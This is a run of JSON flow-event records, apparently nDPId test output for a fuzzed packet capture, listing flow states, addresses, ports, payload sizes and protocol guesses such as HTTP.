-00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546079,"flow_last_seen":1031854546079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.52.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2093,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546079,"flow_last_seen":1031854546079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.52.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854543322,"flow_last_seen":1031854543322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854543322,"flow_last_seen":1031854543322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"0.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"0.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489131,"flow_last_seen":1031854489131,"flow_idle_time":7440000,"flow_min_l4_payload_len":427,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":427,"flow_avg_l4_payload_len":427,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.6.3.5","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489131,"flow_last_seen":1031854489131,"flow_idle_time":7440000,"flow_min_l4_payload_len":427,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":427,"flow_avg_l4_payload_len":427,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.6.3.5","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562489,"flow_last_seen":1031854562489,"flow_idle_time":7440000,"flow_min_l4_payload_len":800,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":800,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.70.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Cloudflare","breed":"Acceptable","category":"Web"},"http": {}} -00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562489,"flow_last_seen":1031854562489,"flow_idle_time":7440000,"flow_min_l4_payload_len":800,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":800,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.70.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"51.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"51.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"72.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"72.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854484481,"flow_last_seen":1031854484482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2600,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854484481,"flow_last_seen":1031854484482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1031854488666,"flow_last_seen":1031854499919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5827,"flow_avg_l4_payload_len":529,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1031854495447,"flow_last_seen":1031854506544,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":1195,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.82.5","src_port":80,"dst_port":2603,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.82.5","src_port":80,"dst_port":2603,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.77","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.77","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854514843,"flow_last_seen":1031854525904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854514843,"flow_last_seen":1031854525904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1031854532142,"flow_last_seen":1031854543315,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1823,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1031854535021,"flow_last_seen":1031854546079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1031854535021,"flow_last_seen":1031854546079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1031854557802,"flow_last_seen":1031854568982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4508,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854562320,"flow_last_seen":1031854562528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854562320,"flow_last_seen":1031854562528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565449,"flow_last_seen":1031854565449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.148.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 